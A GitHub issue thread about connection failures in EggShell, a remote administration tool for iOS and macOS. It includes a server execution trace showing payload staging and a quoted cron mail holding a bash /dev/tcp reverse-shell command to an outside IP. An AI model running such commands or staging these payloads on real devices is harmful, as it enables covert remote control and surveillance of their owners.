search

lucasjacks0n / EggShell

iOS/macOS/Linux Remote Administration Tool
GNU General Public License v2.0
1.66k stars 382 forks source link

Cannot get past 'Establishing Secure Connection...' #83

Open hsaevol opened 6 years ago

hsaevol commented 6 years ago

Hello I am using the current build on linux. When I try to connect my iOS 11.0.3 I get hung up at 'Establishing Secure Connection...' I have traced the execution and pasted below. Any suggestion, need help.

[] SET LPORT (Leave blank for 4444)> server.py(59): if not lport: server.py(60): lport = 4444 server.py(61): try: server.py(62): lport = int(lport) server.py(66): if lport < 1024: server.py(69): break server.py(70): h.info_general("LPORT = " + str(lport)) --- modulename: helper, funcname: info_general helper.py(32): print "{0}[] {1}{2}".format(COLOR_INFO,WHITE,string) [] LPORT = 4444 server.py(71): self.host = socket.gethostbyname(lhost) server.py(72): self.port = lport server.py(73): return True eggshell.py(54): server.start_single_handler() --- modulename: server, funcname: start_single_handler server.py(79): session = self.listen_for_stager() --- modulename: server, funcname: listen_for_stager server.py(142): identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n' server.py(145): s = socket.socket() --- modulename: socket, funcname: init socket.py(190): if _sock is None: socket.py(191): _sock = _realsocket(family, type, proto) socket.py(192): self._sock = _sock socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: server.py(146): s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) --- modulename: socket, funcname: meth socket.py(228): return getattr(self._sock,name)(args) server.py(147): s.bind(('0.0.0.0', self.port)) --- modulename: socket, funcname: meth socket.py(228): return getattr(self._sock,name)(args) server.py(148): s.listen(1) --- modulename: socket, funcname: meth socket.py(228): return getattr(self._sock,name)(args) server.py(149): if self.is_multi == False: server.py(150): h.info_general("Listening on port "+str(self.port)+"...") --- modulename: helper, funcname: info_general helper.py(32): print "{0}[] {1}{2}".format(COLOR_INFO,WHITE,string) [] Listening on port 4444... server.py(151): try: server.py(152): conn, addr = s.accept() --- modulename: socket, funcname: accept socket.py(206): sock, addr = self._sock.accept() socket.py(207): return _socketobject(_sock=sock), addr --- modulename: socket, funcname: init socket.py(190): if _sock is None: socket.py(192): self._sock = _sock socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: socket.py(194): setattr(self, method, getattr(_sock, method)) socket.py(193): for method in _delegate_methods: server.py(157): hostAddress = addr[0] server.py(158): if self.is_multi == False: server.py(159): h.info_general("Connecting to "+hostAddress) --- modulename: helper, funcname: info_general helper.py(32): print "{0}[] {1}{2}".format(COLOR_INFO,WHITE,string) [] Connecting to 192.168.01.01 server.py(160): conn.send(identification_shell_command) server.py(161): device_arch = conn.recv(128).strip() server.py(162): if not device_arch: server.py(165): try: server.py(166): bash_stager, executable = self.craft_payload(device_arch) --- modulename: server, funcname: craft_payload server.py(92): if not self.host: server.py(94): if not self.port: server.py(96): payload_parameter = h.b64(json.dumps({"ip":self.host,"port":self.port,"debug":1})) --- modulename: init, funcname: dumps init.py(240): if (not skipkeys and ensure_ascii and init.py(241): check_circular and allow_nan and init.py(242): cls is None and indent is None and separators is None and init.py(243): encoding == 'utf-8' and default is None and not sort_keys and not kw): init.py(244): return _default_encoder.encode(obj) --- modulename: encoder, funcname: encode encoder.py(194): if isinstance(o, basestring): encoder.py(207): chunks = self.iterencode(o, _one_shot=True) --- modulename: encoder, funcname: iterencode encoder.py(222): if self.check_circular: encoder.py(223): markers = {} encoder.py(226): if self.ensure_ascii: encoder.py(227): _encoder = encode_basestring_ascii encoder.py(230): if self.encoding != 'utf-8': encoder.py(236): def floatstr(o, allow_nan=self.allow_nan, encoder.py(237): _repr=FLOAT_REPR, _inf=INFINITY, _neginf=-INFINITY): encoder.py(259): if (_one_shot and c_make_encoder is not None encoder.py(260): and self.indent is None and not self.sort_keys): encoder.py(261): _iterencode = c_make_encoder( encoder.py(262): markers, self.default, _encoder, self.indent, encoder.py(263): self.key_separator, self.item_separator, self.sort_keys, encoder.py(264): self.skipkeys, self.allow_nan) encoder.py(270): return _iterencode(o, 0) encoder.py(208): if not isinstance(chunks, (list, tuple)): encoder.py(210): return ''.join(chunks) --- modulename: helper, funcname: b64 helper.py(52): return base64.b64encode(s) --- modulename: base64, funcname: b64encode base64.py(54): encoded = binascii.b2a_base64(s)[:-1] base64.py(55): if altchars is not None: base64.py(57): return encoded server.py(97): if device_arch in self.macos_architectures: server.py(110): elif device_arch in self.ios_architectures: server.py(111): if self.is_multi == False: server.py(112): h.info_general("Detected iOS") --- modulename: helper, funcname: info_general helper.py(32): print "{0}[] {1}{2}".format(COLOR_INFO,WHITE,string) [] Detected iOS server.py(113): f = open("resources/esplios", "rb") server.py(114): payload = f.read() server.py(115): f.close() server.py(120): "/tmp/espl "+payload_parameter+" 2>/dev/null &\n" server.py(121): return (instructions,payload) server.py(172): if self.is_multi == False: server.py(173): h.info_general("Sending Payload") --- modulename: helper, funcname: info_general helper.py(32): print "{0}[] {1}{2}".format(COLOR_INFO,WHITE,string) [] Sending Payload server.py(174): conn.send(bash_stager) server.py(175): conn.send(executable) server.py(176): conn.close() --- modulename: socket, funcname: close socket.py(199): self._sock = _closedsocket() socket.py(200): dummy = self._sock._dummy socket.py(201): for method in _delegate_methods: socket.py(202): setattr(self, method, dummy) socket.py(201): for method in _delegate_methods: socket.py(202): setattr(self, method, dummy) socket.py(201): for method in _delegate_methods: socket.py(202): setattr(self, method, dummy) socket.py(201): for method in _delegate_methods: socket.py(202): setattr(self, method, dummy) socket.py(201): for method in _delegate_methods: socket.py(202): setattr(self, method, dummy) socket.py(201): for method in _delegate_methods: socket.py(202): setattr(self, method, dummy) socket.py(201): for method in _delegate_methods: server.py(177): if self.is_multi == False: server.py(178): h.info_general("Establishing Secure Connection...") --- modulename: helper, funcname: info_general helper.py(32): print "{0}[] {1}{2}".format(COLOR_INFO,WHITE,string) [] Establishing Secure Connection... server.py(179): try: server.py(180): return self.listen_for_executable_payload(s) --- modulename: server, funcname: listen_for_executable_payload server.py(191): ssl_con, hostAddress = s.accept() --- modulename: socket, funcname: accept socket.py(206): sock, addr = self._sock.accept()

LiesRapas commented 6 years ago

Yea, me neither...

lucasjacks0n commented 6 years ago

are you running eggshell inside of a virtual machine?

LiesRapas commented 6 years ago

Nah, i'm running it on a raspberry pi, with kali linux, but i encountered the same issues on mac os high sierra when i installed it on my macbook pro

2018-03-25 22:41 GMT+02:00 Lucas Jackson notifications@github.com:

are you running eggshell inside of a virtual machine?

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/neoneggplant/EggShell/issues/83#issuecomment-376001722, or mute the thread https://github.com/notifications/unsubscribe-auth/AkBUO_X1JmRH7ZWPOGONbzjVSmn1UYUDks5tiAD6gaJpZM4SS4CV .

ghost commented 6 years ago

@neoneggplant it's because the openssl libraries are not being statically linked in the xcode project properly. It's dynamic, and if the target hasn't installed openssl via macports or brew then the dylibs aren't available. I have this working now in an xcode project, i'll tidy and put in a PR.

Same as issue 78 and all the other "establishing encrypted connection" bugs... it's because the binary is failing to run on the target.

LiesRapas commented 6 years ago

Thanks a lot ! it worked when i installed openssl !

2018-03-27 4:31 GMT+02:00 hhdevteam notifications@github.com:

@neoneggplant https://github.com/neoneggplant it's because the openssl libraries are not being statically linked in the xcode project properly. It's dynamic, and if the target hasn't installed openssl via macports or brew then the dylibs aren't available. I have this working now in an xcode project, i'll tidy and put in a PR.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/neoneggplant/EggShell/issues/83#issuecomment-376375959, or mute the thread https://github.com/notifications/unsubscribe-auth/AkBUOyxAcMaksDJQC-Yy6Oz3JzOk-sLAks5tiaRygaJpZM4SS4CV .

hsaevol commented 6 years ago

Looking forward to exploring and all the neat features!,

Sent from my iPhone

On Mar 28, 2018, at 7:37 AM, LiesRapas notifications@github.com wrote:

Thanks a lot ! it worked when i installed openssl !

2018-03-27 4:31 GMT+02:00 hhdevteam notifications@github.com:

@neoneggplant https://github.com/neoneggplant it's because the openssl libraries are not being statically linked in the xcode project properly. It's dynamic, and if the target hasn't installed openssl via macports or brew then the dylibs aren't available. I have this working now in an xcode project, i'll tidy and put in a PR.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/neoneggplant/EggShell/issues/83#issuecomment-376375959, or mute the thread https://github.com/notifications/unsubscribe-auth/AkBUOyxAcMaksDJQC-Yy6Oz3JzOk-sLAks5tiaRygaJpZM4SS4CV .

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or mute the thread.

lucasjacks0n commented 6 years ago

@hhdevteam Awesome that you found that, I was having a hard time recreating the issue!

lucasjacks0n commented 6 years ago

Can anyone who is having the issue let me know if this works? I believe the library is now statically linked in esplmacos https://github.com/neoneggplant/EggShell/tree/dev

keshaipad commented 6 years ago

@neoneggplant Something wrong with that one "dev" branch I think...

Initializing server...
Traceback (most recent call last):
  File "eggshell.py", line 158, in <module>
    eggshell = EggShell()
  File "eggshell.py", line 11, in __init__
    self.server = server.Server()
  File "/root/eggShellDev/modules/server.py", line 21, in __init__
    self.modules_python = self.import_modules("modules/commands/python")
  File "/root/eggShellDev/modules/server.py", line 30, in import_modules
    for mod in os.listdir(path):
OSError: [Errno 2] No such file or directory: 'modules/commands/python'
lucasjacks0n commented 6 years ago

@keshaipad sorry about that, just pushed a fix, try now :)

keshaipad commented 6 years ago

Hehe. There now another problem. I try to connect - but nothing happened. And when exit from MultiHandler - get some error about ssl

Menu:

    1): Start Server
    2): Start MultiHandler
    3): Create Payload
    4): Exit

EggShell> 2
[*] SET LHOST (Leave blank for 125.5.247.62)>
[*] LHOST = 125.5.247.62
[*] SET LPORT (Leave blank for 4444)>2525
[*] LPORT = 2525
[*] Listening on port 2525...
[*] Type "help" for commands

MultiHandler> exit
[*] Cleaning up...
[*] SSL error: [Errno 8] _ssl.c:510: EOF occurred in violation of protocol end start multihandler
lucasjacks0n commented 6 years ago

what python/ssl version do you have installed? $ python --version $ openssl version

keshaipad commented 6 years ago

Linux: (server) Python 2.7.6 OpenSSL 1.0.1f 6 Jan 2014

Mac: (client) Python 2.7.10 OpenSSL 0.9.8zg 14 july 2015

also, on Mac terminal I find a lot of mails like this:

From mactest@macTests-MacBook-Pro.local  Wed Apr 11 03:13:03 2018
X-Original-To: mactest
Delivered-To: mactest@macTests-MacBook-Pro.local
From: mactest@macTests-MacBook-Pro.local (Cron Daemon)
To: mactest@macTests-MacBook-Pro.local
Subject: Cron <mactest@macTests-MacBook-Pro> bash &> /dev/tcp/125.5.247.62/2020 0>&1 2>/dev/null
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=mactest>
X-Cron-Env: <USER=mactest>
X-Cron-Env: <HOME=/Users/mactest>
Date: Wed, 11 Apr 2018 03:13:02 -0700 (PDT)

/bin/sh: connect: Connection refused
/bin/sh: /dev/tcp/125.5.247.62/2020: Connection refused
computer00776 commented 6 years ago

So do we need to install openssl on target ? if so can someone tell me the command to do so please. Thanks guys

lucasjacks0n commented 6 years ago

the dev branch should have the esplmacos ssl library statically linked

computer00776 commented 6 years ago

Sorry buddy Still not working Stuck on establishing secure connection even with the tree/dev version

lucasjacks0n commented 6 years ago

is the target a linux machine? Openssl will have to be installed

computer00776 commented 6 years ago

no its a mac machine do i still need to install Openssl ?

molomilo commented 6 years ago

Hello, thank you for your Eggshell. I still have'nt a solution for the etablishing secure connection. New? I am on kali to iphone 4 in 7.1.2 jaillbreak. Open SSL is installed on the iphone but nothing works. Even the version with DEV does'nt work. Need help.

KodiacSecurity commented 6 years ago

As stated above the ssl library is statically linked in the dev-branch. It solves the problem. Tested on Sierra, Yosemite and Snow leopard.

If not, fall back to https://github.com/neoneggplant/EggShell/tree/dd9f71eb3cc59ebb2d0e3bf27fa6affa0f47b993

lucasjacks0n commented 6 years ago

EggShell iOS payload now supports iOS 11 (added platform-application entitlement), fixes iOS stage where it gets stuck at "Establishing Secure Connection". I have tested on my iPhone 7 11.3.1. Can anyone confirm this on their iOS device?

shegner commented 6 years ago

I connect with Kali Linux (up to date) to an older iPad with iOS 9.3.5 (jail breaked, MTerminal). I tried master and dev branch. No Luck. Eggshell hangs on 'Establishing Secure Connection...' So I tried the older version as KodiacSecurity proposed. That work's, but only a few commands are working like sysinfo or alert. Camera, open app etc. are NOT working. Is there a version, I can use, so that taking pictures and open apps are working?